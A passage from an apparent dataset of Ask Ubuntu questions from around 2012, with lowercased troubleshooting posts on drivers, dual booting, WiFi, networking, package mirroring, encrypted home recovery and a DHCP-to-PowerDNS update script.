, gl_arb_texture_mirrored_repeat , gl_arb_texture_non_power_of_two , gl_arb_texture_rectangle , gl_arb_transpose_matrix , gl_arb_vertex_program , gl_arb_window_pos , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_draw_range_elements , gl_ext_fog_coord , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_framebuffer_object , gl_ext_multi_draw_arrays , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_specular_color , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_ext_subtexture , gl_ext_texture3d , gl_ext_texture_compression_s3tc , gl_ext_texture_edge_clamp , gl_ext_texture_env_add , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_lod , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_rectangle , gl_ext_vertex_array , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ati_texture_mirror_once , gl_atix_texture_env_combine3 , gl_ibm_texture_mirrored_repeat , gl_ingr_blend_func_separate , gl_nv_texture_rectangle , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_sgix_shadow_ambient , gl_sun_multi_draw_arrays however , i did a search for that library and it is somewhere else : $ locate swrast_dri.so /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so
224851	nvidia drivers , ubuntu 12.10 , geforce gt 540m	how do i install nvidia drivers for ubuntu 12.10 ? i have a geforce gt 540m and have been trying to do this for the past 2 months with no luck . i tried the official repository , then i added the x swat ppa . i 've installed linux-headers-generic and linux-source , and virtually every solution google has to offer . throughout the course of this i must have done at least 25 fresh installs of ubuntu ; does anybody else ( with a gt 540m ) have this problem ?
224853	simulated log of	when i run cs 1.6 im getting error , when i want to launch the game im getting error : a simulated log of or shutdown is in process . can i solve this problem ? i think im getting this error because of wine aplication installed on linux ...
224857	ubuntu 12.10 - windows 8 dual boot ( tried boot-repair ) - dual os option not showing	as title says , this is my first time trying ubuntu . i have been trying since last week with continuous googling and searching , but still no luck . i had win8 x64 installed before , then tried installing ubuntu 12.10 desktop ( dual os option ) . i tried like 10 times already , everytime it 's showing installation complete , but when i restarted and boot from my hdd , dual boot option is not showing , directly to win8 startup i installed win8 on c : before . i had a 104gb free drive to install linux to ( it 's installed already.. but the dual boot option is not showing ) in case it helps : acer aspire 4752 , intel core i3 , 2.30ghz , 4gb ram , 64 bit os - windows 8 pro with media center . this is the url i got from the boot-repair : http : //paste.ubuntu.com/1407018/ ( it 's not win vista , thou it seems showing so in the link ) . thanks a lot . any help will be greatly appreciated . i really want to get my linux installed .
224859	vpn connection breaks with hint `` short read ( -1 ) : message too long ''	i have duall access l2tp connection to internet through router and pptp connection to my company 's local network . network manager connects succesfully to vpn , but when i try to get some resources from company 's network ( for examle , clone git repository or connect to jira 's dashboard ) , vpn connection breaks up with message ( from syslog ) : short read ( -1 ) : message too long whereas connection to moinmoin wiki causing no errors . ubuntu version : 12.10
224861	wordpress asks for ftp credentials , even though owner of the whole /var/www is www-data	i 'm trying to get wordpress to run on my local ubuntu 12.10 installation . when i try to install themes/plugins , it asks me for ftp credentials . i 've been trying to get this to work for 2 days now . everywhere on the web it says you should change the owner : group of your wordpress directory to whateverowner : group runs your apache server - in my case www-data : www-data . i 've done this , and even tried setting permissions to the whole /var/www directory to 777 , restarting apache and the whole system . but wordpress is still asking me for the ftp credentials . what else could this be ?
224862	best way to reinstal ubuntu ?	i have ubuntu dual booting with windows 7 on my laptop . i ran into an issue with mounting the encrypted folders , it just wo n't boot . i want to downgrade to 12.04 . what is the best way to uninstall 12.10 and install 12.04 in it 's place ? i have separate partitions for boot , root , swap , and home . i would like to leave windows intact . thanks .
224865	how to change menu opacity	i know how to change the opacity of the task bar in unity on ubuntu 12.10 via compiz . my question is , is there a way i can change the opacity of the menus ? see , in the image below , it shows the app bar that it almost transparent . but , on the calendar , it is mostly black . i would like to make it match the app menu and all other menus .
224866	does lvm option delete existing operating systems ?	i accidentally clicked this option when installing 12.10 . now , i am not seeing my other operating systems show up . i tried fgrep menuentry /boot/grub/grub/.cfg and only see ubuntu . when i checked my partitions using fdsik , i saw that there are three partitions still . if the operating systems are still there , how would i be able to access them ?
224867	how to change the color of particular file ?	i want to change the color of particular file type : for .c files red for .out files green for .sh files orange like this , how to make these colors as default color for the corresponding file type ?
224871	colors from graphic card gets sometime inverted	colors from graphic card gets sometime inverted . when i start ubuntu 12.04 its just fine , but sometimes after some time the colors get inverted . i use a 40 '' lcd-tv as a monitor , and if i cahnge the cannel and then turn it back its ok again for some time and then it happend again . i have a `` sapphire radeon hd5450 ddr3 hdmi 1gb '' and a 50hz sony tv . i have a dual boot so it happens the same in my windows 8 , i have a nother computer connected to my tv and i have never had a problem like that earlier .
224875	advantages & disadvantages of cairo , tkinter and pygame in python ?	we are trying to develop a painting area with integrated tools to draw lines , circles , selection tool and trying to enhance the image manipulation process . is it possible do the things in text view or drawing area ? tkinter , pygame , cairo which one is the best package to develop these components ?
224877	creating ddns with udhcpd and powerdns	server os = ubuntu 12.0.4.1 lts desktop os = windows 7 , ubuntu 12.04.1 lts dhcp server daemon = udhcp dns server daemon = powerdns ( using mysql as the backend ) i am very new to the linux scene , been playing with it for the past 2 weeks , i have sifted through many web pages and articles and i am extremely impressed and thankful with the linux community 's willingness to share their knowledge . what i am really battling to find is a website / article that can explain how to setup udhcp so that every time a lease is granted an entry into the dns server is made and when a lease is revoked that entry is then deleted . it would be appreciated if the answers could include some examples as to how i can implement it . thank you mark hollander linux newbie ( only for the moment )
224880	curl and system proxy	i am currently forwarding all my traffic through a ssh tunnel : ssh -nd 8080 user @ remote-machine and have set the system socks5 proxy ( in system settings under network section ) to 127.0.0.1:8080 . everything works fine , google chrome and other programs are using the socks proxy as supposed to . the problem comes when i 'm trying to use curl ( either in terminal or using it in php ) . what i get is this : user @ laptop : ~ $ curl -v google.com * about to connect ( ) to proxy 127.0.0.1 port 8080 ( # 0 ) * trying 127.0.0.1 ... connected > get http : //google.com http/1.1 > user-agent : curl/7.22.0 ( i686-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 > host : google.com > accept : */* > proxy-connection : keep-alive > * empty reply from server * connection # 0 to host 127.0.0.1 left intact curl : ( 52 ) empty reply from server * closing connection # 0 i tried to google around but could n't find anything relevant . so how do i get curl to work with system proxy ( if present ) ? i would like to be able to setup an alias that would work with both cases ( proxy and no proxy ) because i will not be always willing to use the proxy .
224882	how do i install ubuntu without using all harddrive space	i want to install ubuntu without using all the space on my hard drive . where can i learn how to properly manually create the partitions during installation of 12.10 ?
224889	how do i avoid random wireless lan disconnects ?	i am presently experiencing random disconnections from my wireless network . it looks like it is becoming more and more frequent ( however i have not seen any clear pattern ) . this is killing me ... basically at some point the wifi network stops being detected and i can not see any network anymore like if the network card was shut down below is some information that should help as well as one attempt to fix it ( from ubuntu forums ) . machine : acer aspire s3 ( exact model no . aspire s3-951-2464g34iss ) statquant @ euclide : ~ $ lsb_release -d description : ubuntu 12.04.1 lts statquant @ euclide : ~ $ uname -mr 3.2.0-33-generic x86_64 statquant @ euclide : ~ $ sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... statquant @ euclide : ~ $ lspci 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) statquant @ euclide : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 004 : id 064e : c321 suyin corp . bus 002 device 003 : id 0bda:0129 realtek semiconductor corp. statquant @ euclide : ~ $ ifconfig wlan0 link encap : ethernet hwaddr 74 : de:2b : dd : c4:78 inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :76de:2bff : fedd : c478/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:913 errors:0 dropped:0 overruns:0 frame:0 tx packets:802 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:873218 ( 873.2 kb ) tx bytes:125826 ( 125.8 kb ) statquant @ euclide : ~ $ iwconfig wlan0 ieee 802.11bgn essid : '' bbox-d646d1 '' mode : managed frequency:2.437 ghz access point : 00:19:70:80:01:6c bit rate=65 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=56/70 signal level=-54 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:71 missed beacon:0 statquant @ euclide : ~ $ dmesg | grep `` wlan '' [ 17.495866 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 17.498950 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 20.072015 ] wlan0 : authenticate with 00:19:70:80:01:6c ( try 1 ) [ 20.269853 ] wlan0 : authenticate with 00:19:70:80:01:6c ( try 2 ) [ 20.272386 ] wlan0 : authenticated [ 20.298682 ] wlan0 : associate with 00:19:70:80:01:6c ( try 1 ) [ 20.302321 ] wlan0 : rx assocresp from 00:19:70:80:01:6c ( capab=0x431 status=0 aid=1 ) [ 20.302325 ] wlan0 : associated [ 20.307307 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 30.402292 ] wlan0 : no ipv6 routers present statquant @ euclide : ~ $ sudo lshw -c network [ sudo ] password for statquant : *-network description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 74 : de:2b : dd : c4:78 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-33-generic firmware=n/a ip=192.168.1.3 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c0400000-c047ffff memory : afb00000-afb0ffff statquant @ euclide : ~ $ iwlist scan wlan0 scan completed : cell 01 - address : 00:19:70:80:01:6c channel:6 frequency:2.437 ghz ( channel 6 ) quality=56/70 signal level=-54 dbm encryption key : on essid : '' bbox-d646d1 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000125fb152bb extra : last beacon : 40020ms ago ie : unknown : 000b42626f782d443634364431 ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : dd180050f2020101820003a4000027a4000042435e0062322f00 ie : unknown : 2d1a4c101bff00000000000000000000000000000000000000000000 ie : unknown : 3d1606080800000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd0a00037f04010000000000 i did the following ( after looking for fixes of similar problems ) , but unfortunately this fails to fix my issue . sudo modprobe -r iwlwifi sudo modprobe iwlwifi 11n_disable=1 this is a snapshot i obtained via iwscanner , as you can see even when the wifi is working there is small losses i did this following the following this thread , worked well for a few hour but i got a disconnection : ( here is what i did : statquant @ euclide : ~ $ sudo modprobe -rfv ath9k [ sudo ] password for statquant : rmmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko rmmod /lib/modules/3.2.0-34-generic/kernel/net/mac80211/mac80211.ko rmmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko rmmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko rmmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath.ko rmmod /lib/modules/3.2.0-34-generic/kernel/net/wireless/cfg80211.ko statquant @ euclide : ~ $ sudo modprobe -v ath9k nohwcrypt=1 insmod /lib/modules/3.2.0-34-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath.ko insmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko insmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko insmod /lib/modules/3.2.0-34-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.2.0-34-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko nohwcrypt=1
224892	how to install a bin file to a particular target location ?	i need to install a bin file . my home dir is /home/user . the bin file is present at /apps/ba/software . i need to install this at /apps/ba/ins . how can i do that ?
224894	package version updates policy	not sure if here it 's the right place to ask , if not - please point me to the right direction . let 's say there 's a package , for the sake of real-world example - bind9 . in precise and in quantal it 's version 9.8.1 . the original developer ( isc ) currently provide versions 9.8.4 which is a bugfix release in the 9.8 line , and 9.9.2 which is a `` new features '' branch . it looks like when a security issue is encountered , the specific bugfix is backported into 9.8.1 . now the question : why maintainers do n't just update to the latest bugfix release ? why to backport only certain patches ? is it intentionally or just there 's no maintaner who would take the effort to update to the latest bugfix release ?
224901	can some one tell me the major differences between ubuntu 11.10 and 12.04 ?	can someone tell me the major differences between ubuntu 11.10 and 12.04 please ?
224903	unable to start netperf server	i am working on ubuntu 12.10 and i just installed netperf by apt-get install netperf . then i tried to start netperf server by running netserver and i got unable to start netserver with 'in ( 6 ) addr_any ' port '12865 ' and family af_unspec can anybody help me ? i did n't find anything about it in netperf faq .
224909	wget to get files from external host	i 'm trying to use wget to download all mp3 files linked to from a list of input urls , but residing on an external host . the input urls are contained in the file input.txt each url listed in input.txt leads to an index.html which has several links on a local host ( which i do n't care about ) , as well as a link to http : //external.server.is.here.com/path/some_audio_file.mp3 ( which i am trying to download ) . the same external server is used for all the mp3 files i am interested in . i 've tried : wget -r -l1 -h -a *.mp3 -dexternal.server.is.here.com -i input.txt but this results in all index.html files being rejected , and therefore they 're not followed either . the next attempt : wget -r -l1 -h -a *.mp3 , *.html -dexternal.server.is.here.com -i input.txt gets all the index.html files , but does not get any of the linked mp3 files from the external server . the next attempt : wget -r -l1 -h -a *.mp3 , *.html -i input.txt gives the same result as the previous attempt . as well as using -l2 for depth .
224919	how do i replace splash screen messages ?	i wanted to ask how to change the messages that the splash screen has while asking for the encryption password with a simple text like `` insert password '' . dunno if it has already been answered this question . thanks in advance for the answer .
224921	can i have ipsec-tools working for non standard ports ?	i was trying to set up a manually-keyed connection via ipsec-tools between two ubuntu 12.04 servers , following this simple tutorial , but one of that two servers , has just a range of ports 3000 .. 3100 available , because of firewall constriction . is it possible set them up non standard port and if yes how ?
224922	entire system corrupted due to .exe files flooded in the system	i have been using ubuntu11.04 for last 3-4 months . few day ago , i installed wine1.4 to run .exe files on my system . now a virus is flooded in the entire system which creates a .exe file in each & every folder . and i am unable to view pdf files , .doc documents not even c programs . all the files are corrupted . i am about to loose all of my data & unfortunately ... . quit ubuntu ... anyone please let me know how to recover this data ...
224927	my partition table is facing limitations ; having problems creating more partitions	i first noticed an issue when trying to install linux mint 14 as a third os alongside ubuntu 12.10 and windows 7 - i was unable to create another partition to install mint to . poking around , i realised that i had reached the limit of primary partitions : ( from left to right of the table ) 1 ) a ~100 mb primary partition that i meant to use for storing grub files but never got down to , 2 ) a 25 gb extended partition , with the entire partition containing an ext4 ubuntu partition , 3 ) a ~513 gb partition containing windows 7 , 4 ) some ~50 gb of unallocated space , and finally 5 ) a 4 gb swap partition . i decided to wipe off the first ~100 mb partition , which i did n't need anyway . this brought me to a dilemma , however : as ubuntu , during initial installation , had created an extended partition for itself , which meant that i could not create any more . having an extended partition for ubuntu is virtually useless as there is only enough space to contain ubuntu itself , and the benefits of extended are worthless here . and if i go ahead and install mint now , i would face the same issue of too many primary partitions in the future should i want to create any more . what i 'd really like to do is this : convert the current extended partition into a normal primary partition , and create a new extended partition in the unallocated space for all future partitions . is this possible , and if so how ? thanks in advance !
224929	did `` sudo dconf reset -f /org/compiz '' . how to restore /org/compiz gsettings from backup ?	i 'm using 12.04 . i executed : sudo dconf reset -f /org/compiz now changing settings in compizconfig settings manager ( ccsm ) has no effect . for example , changing the number of desktops has no effect . i found that the number of desktops is now controlled by the gsettings registry , which i suppose may not be connected to the 12.04 ccsm ( ccsm preferences says it is using the gconf backend , there is no gsettings or dconf option there ) . that 's ok , but my place windows stopped working and i do n't know how to configure it now . presumably a previous upgrade migrated my gconf compiz entries to gsettings and at that time ccsm stopped working and i did n't notice because i was n't trying to change anything -- but now perhaps i have wiped out the place windows and other settings that were migrated , how do i re-migrate them ? i would actually like to just put things back to where they were before i executed sudo dconf reset . i have a backup of my hard drive available , i just need to know which files to rollback . i tried rolling back the .config , .gconf , and .cache directories , to no avail . which files is gsettings storing stuff in , and how do i read the entries in those files in my backups directly to confirm that they contain org.compiz entries ? alternately , how do i manually redo the gconf- > gsettings migration for compiz , if there even was one ? incidentally , where is the documentation for this sort of thing ( which documentation specifies where unity and compiz store config settings ? ) ? and where does dconf store things ? and where is dconf 's documentation ? http : //dag.wieers.com/home-made/dconf/dconf.1.html says nothing about the 'reset ' command , and it says it stores things in /var/log/dconf , but nothing was there . are there two things named 'dconf ' ? thanks , bayle
224930	how to recover lost partition and files after installation of ubuntu on windows partition ?	i have got a laptop from one my friend which has installed ubuntu by choosing a wrong option and has re-partitioned the entire hard drive and has lost all his private files . i booted the laptop by a live linux cd and i can see 4 partitions . first , one system partition 1,86 gb ntfs , then 2 x 46.5gb for ubuntu and lastly a 603gb unallocated partition . he does n't need to keep ubuntu just wants to back his files as there are crucial . i know some parts of data have been overwritten but wondering if there is a way that i can recover the data ?
224931	where is the task manager ?	is there any ui in ubuntu like the one in windows to kill the processes forcefully . my google chrome application is stuck and i ca n't close it , need to do it forcefully.please help !
224942	why are linux-headers not upgraded by apt-git dist-upgrade	after a fresh ubuntu 12.10 installation , i faced some problems installing nvidia drivers . after some research discovered that linux-headers are not being upgraded when executing sudo apt-get dist-upgrade . i had to install the new headers manually although linux-image packages are installed . anyone knows why is this happening to me ? is it normal or there 's something wrong ?
224943	black screen after 12.04 installation	i have installed ubuntu 12.04 ( 64bit ) on a new windows 8 sony laptop that i have bought recently . when i attempt to boot ubuntu all that appears is a black screen with a single coloured line across the top . could this be the result of some incompatibility with the system graphics card , amd radeon hd 7650m 1gb ? how do i solve this ? thanks you for any help .
224948	'e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) ' on running update manager ?	could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the update-manager package and include the following error message : e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) on running update manager . also software update center not working . what should i do ?
224950	ecryptfs-recover-private creating unreadable encrypted folders	after months of proper functioning has ecryptfs has become corrupted and rendered /home/ inaccessible . when running ( both via guest account and from live-cd ) : root @ ubuntu : /media/backup/home/me # ecryptfs-mount-private error : encrypted private directory is not setup properly` i then tried : root @ ubuntu : /media/backup/home/me # ecryptfs-recover-private info : searching for encrypted private directories ( this might take a while ) ... info : found [ /media/backup/home/.ecryptfs/me/.private ] . try to recover this directory ? [ y/n ] : y info : found your wrapped-passphrase do you know your login passphrase ? [ y/n ] n info : to recover this directory , you must have your original mount passphrase . info : when you first setup your encrypted private directory , you were told to record info : your mount passphrase . info : it should be 32 characters long , consisting of [ 0-9 ] and [ a-f ] . enter your mount passphrase : info : success ! private data mounted read-only at [ /tmp/ecryptfs.udwfdmco ] . root @ ubuntu : /media/backup/home/me # ls /tmp/ecryptfs.udwfdmco/ecryptfs_fnek_encrypted.f display all 124 possibilities ? ( y or n ) ' this created 124 encrypted folders which apparently hold my /home/ data . i just do n't know how to access this data . and when looking at /var/log/syslog/ there are very many of the following errors : dec 3 11:19:22 ubuntu kernel : [ 1627.918209 ] ecryptfs_parse_tag_70_packet : error attempting to find auth tok for fnek sig [ 1b62c525049b45e0 ] ; rc = [ -2 ] dec 3 11:19:22 ubuntu kernel : [ 1627.918214 ] ecryptfs_decode_and_decrypt_filename : could not parse tag 70 packet from filename ; copying through filename as-is i would really like to either get ecryptfs working again properly or to at least recover my data . help would be really really appreciated . thanks , daniel
224951	how to make shares only mount for particular users ?	how can i set up shares to conditionally mount depending on which user logged in ? i have some shares on a nas that i put in fstab , and the line in fstab looks like this : 192.168.1.101 : /volume1/data /media/data nfs defaults 0 0 now they mount automatically when i log into my computer ( gnome-shell on ubuntu 12.10 ) , and that 's nice . however they also mount automatically when other users login , and i do n't want that .
224955	how to get on wifi without administrator password	how can i get online on a ubuntu pc without the administrator password ? i have ordinary user privileges , and the wifi itself is not password protected .
224957	apt-move says the packages are moved but they are gone	i 'm trying to setup a ubuntu mirror with selected packages from different repositories , by using apt-move , which i 've been using on ubuntu 10.04 without ( too much ) problems . i 've installed apt-move and setup it accordingly to my needs : # dpkg -l | grep apt-move ii apt-move 4.2.27-2 maintain debian packages in a package pool the configuration file /etc/apt-move.conf is as follows : # cat /etc/apt-move.conf | grep -v -e ^ # -e ^ $ aptsites= '' /all/ '' localdir=/var/local/mirrors/ubuntu dist=precise pkgtype=binary filecache=/var/cache/apt/archives liststate=/var/lib/apt/lists delete=no maxdelete=20 copyonly=no pkgcomp= '' none gzip '' contents=yes gpgkey= of course , i 've created the directory mentioned in localdir . let 's try it . after doing a sudo apt-get -d install vim i have some debs laying around on /var/cache/apt/archives : # ls -1 /var/cache/apt/archives/ libgpm2_1.20.4-4_amd64.deb libpython2.7_2.7.3-0ubuntu3.1_amd64.deb lock partial python2.7_2.7.3-0ubuntu3.1_amd64.deb python2.7-minimal_2.7.3-0ubuntu3.1_amd64.deb vim_2 % 3a7.3.429-2ubuntu2.1_amd64.deb vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb vim-runtime_2 % 3a7.3.429-2ubuntu2.1_all.deb vim-tiny_2 % 3a7.3.429-2ubuntu2.1_amd64.deb i first do a apt-move get . # apt-move get updating from local packages files ... all done , exiting . then a apt-move move : # apt-move move moving files ... skipping files : moving files : /var/cache/apt/archives/libgpm2_1.20.4-4_amd64.deb /var/cache/apt/archives/libpython2.7_2.7.3-0ubuntu3.1_amd64.deb /var/cache/apt/archives/python2.7-minimal_2.7.3-0ubuntu3.1_amd64.deb /var/cache/apt/archives/python2.7_2.7.3-0ubuntu3.1_amd64.deb /var/cache/apt/archives/vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb /var/cache/apt/archives/vim-runtime_2 % 3a7.3.429-2ubuntu2.1_all.deb /var/cache/apt/archives/vim-tiny_2 % 3a7.3.429-2ubuntu2.1_amd64.deb /var/cache/apt/archives/vim_2 % 3a7.3.429-2ubuntu2.1_amd64.deb all done , exiting . so far so good . let 's check the repository pool . # ls -lah /var/local/mirrors/ubuntu/pool/ total 8,0k drwxr-sr-x 2 root staff 4,0k dic 3 11:39 . drwxr-sr-x 5 root staff 4,0k dic 3 11:39 .. oops . it 's empty . so , where are the packages ? # find / -iname vim-common_2 % 3a7.3.429-2ubuntu2.1_amd64.deb # nowhere . nice . the dists dir is empty , too : # ls -lah /var/local/mirrors/ubuntu/dists total 8,0k drwxr-sr-x 2 root staff 4,0k dic 3 11:50 . drwxr-sr-x 5 root staff 4,0k dic 3 11:50 .. however , there 's a .apt-move directory with some information : # ls /var/local/mirrors/ubuntu/.apt-move/ arch binary dists pool precise.arch.amd64 precise.binary source version but there 's not too much info in there , actually . the directories dists and pool are also empty . going more manual wo n't help . using apt-move movefile results in the same : # apt-move movefile vim_2 % 3a7.3.429-2ubuntu2.1_amd64.deb moving files ... skipping files : moving files : /var/cache/apt/archives/vim_2 % 3a7.3.429-2ubuntu2.1_amd64.deb all done , exiting . aaand empty directories . some idea on what could be happening ? am i doing something wrong ? are there some alternatives to apt-move ( that fit my needs here ! ) that are worth trying ?
224964	resize options on ubuntu server virtualbox grayed out	running ubuntu server guest on windows 7 . guest additions are installed properly to the best of my knowledge . but the resizing options are greyed out . the screen stays the same size in full screen and scaled option and `` adjust window size '' stays the same . whats am i doing wrong ? how do i fixit ? let me know if you need any specific information .
224966	how do i get resolvconf to regenerate resolv.conf after i change /etc/network/interfaces ?	after updating /etc/networking/interfaces with something very similar to below , how do i get /etc/resolv.conf to update ? i tried ( as root ) resolver -u , service networking restart but they did n't work . i also fixed the symlink for resolv.conf and tried resolver -u again . finally in frustration i rebooted , which did fix the problem by rebuilding /etc/resolv.conf . ubuntu 12.04 , 64bit server , all the latest patches installed . please let me know the correct way . many thanks . example /etc/networking/interfaces : iface eth0 inet static address 192.168.3.3 netmask 255.255.255.0 gateway 192.168.3.1 dns-search example.com dns-nameservers 192.168.3.45 192.168.8.10
224970	nautilus missing menubar in 12.10	i installed gnome-shell right away , and then i noticed that nautilus main menubar ( file , edit and such menus ) is missing . it does not appear inside the file manager window nor on the `` global menubar '' . ( also happens on unity ) . i googled arround , but nothing solved my problem . things i tried : purge the appmenu-gtk , appmenu-gtk3 , appmenu-qt and indicator-appmenu packages issue this command on terminal look for globalmenu in dconf-editor : could not find it how can i solve that ? i 'm using ubuntu 12.10 , gnome-shell 3.6.1 , nautilus 3.6 also , i used the gnome3-team repository to install gnome-shell
224974	multiple simultanous streaming with pulseaudio	on a home network with three pcs now powered with ubuntu 12.04 , i would like to send audio from one pc to the other two using pulse audio . in effect i want the same music playing simultaneously throughout my house . this would remove any need for apple airports , and remove windows from one of the dual boot dells .
224978	failed to download repository	w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/release unable to find expected entry 'univers/source/sources ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead .
224979	ubiquity does n't see any partitions on the disk	i want to install xubuntu 12.10 on a system which has already windows 7 on it . however , the ubiquity installation program does not recognize any partitions on the system and shows it to me as empty . but fdisk and /dev list the partitions to me , and i can mount them manually . from this question i tried the provided solutions , but neither the dmraid -re command nor running the ubiquity via sudo helped here . according to the last recommendation , i used boot-repair to sum up the trouble , and the paste can be found here . obviously , os-prober does see the windows installation , just ubiquity does n't . i 'd be very thankful for a quick help , i need the dual-boot system for work .
224982	isc-dhcp : battling to get the host name from the dhcp script	server os : ubuntu 12.0.4.1 lts server desktop os : ubuntu 12.0.4.1 lts and windows 7 i have followed an article on the net on how to update a powerdns database . isc dhcp and powerdns how ever i am battling to get the host name of the client requesting the lease . i can see from the log file that the dhcp server has it ( in brackets ) , when i look at the lines : - dhcpd : dhcprequest for 192.168.0.90 from 00:1c : c0:1c:1e:84 ( minion ) via eth0 dhcpd : dhcpack on 192.168.0.90 to 00:1c : c0:1c:1e:84 ( minion ) via eth0 my problem lies in the fact that host-decl-name does not hold any values , i would have thought that it would hold minion as that is the name of the client . how would i get hold of the name minion in the dhcpd.conf execution . b.t.w . minion is a windows 7 machine . my dhcpd.conf : ddns-update-style none ; option domain-name `` butylseal.int '' ; option domain-name-servers 192.168.0.201 , 192.168.0.202 ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.1 192.168.0.99 ; option routers 192.168.0.249 ; option netbios-name-servers 192.168.0.201 ; option netbios-node-type 8 ; on commit { log ( `` ============= [ start commit ] ================ '' ) ; log ( `` the host name is : '' ) ; log ( host-decl-name ) ; set clientip = binary-to-ascii ( 10 , 8 , `` . `` , leased-address ) ; set clientmac = binary-to-ascii ( 16 , 8 , `` : '' , substring ( hardware , 1 , 6 ) ) ; log ( concat ( `` commit : ip : `` , clientip , `` mac : `` , clientmac , `` hostname : `` , host-decl-name ) ) ; execute ( `` /etc/dhcp/dhcp-event '' , '' commit '' , clientip , clientmac , host-decl-name ) ; log ( `` ============ [ end commit ] ================== '' ) ; } on release { log ( `` ============ [ start release ] =============== '' ) ; set clientip = binary-to-ascii ( 10 , 8 , `` . `` , leased-address ) ; set clientmac = binary-to-ascii ( 16 , 8 , `` : '' , substring ( hradware , 1 , 6 ) ) ; log ( concat ( `` release : ip : `` , clientip , `` mac : `` , clientmac , `` hostname : `` , host-decl-name ) ) ; execute ( `` /etc/dhcp/dhcp-event '' , `` release '' , clientip , clientmace , host-decl-name ) ; log ( `` =========== [ end release ] ================== '' ) ; } on expiry { log ( `` =========== [ start expiry ] ================ '' ) ; set clientip = binary-to-ascii ( 10 , 8 , `` . `` , leased-address ) ; set clientmac = binary-to-ascii ( 16 , 8 , `` : '' , substring ( hardware , 1 , 6 ) ) ; log ( concat ( `` expiry : ip : `` , clientip , `` mac : `` , clientmac , `` hostname : `` , host-decl-name ) ) ; execute ( `` /etc/dhcp/dhcp-event '' , `` expiry '' , clientip , clientmac ) ; log ( `` =========== [ end expiry ] ================= '' ) ; } } the scrip to execute : # ! /usr/bin/env python import mysqldb import os , sys import pprint pp = pprint.prettyprinter ( ) mysql_host = `` localhost '' mysql_user = `` mysqlusr '' mysql_pass = `` mysqlpass '' mysql_db = `` mypdnsdb '' if ( len ( sys.argv ) > 1 ) : command = sys.argv [ 1 ] clientip = sys.argv [ 2 ] clientmac = sys.argv [ 3 ] hostname = sys.argv [ 4 ] if command == `` commit '' : pp.pprint ( `` commit '' ) f = open ( `` /tmp/leases '' , '' a '' ) s = `` leased : 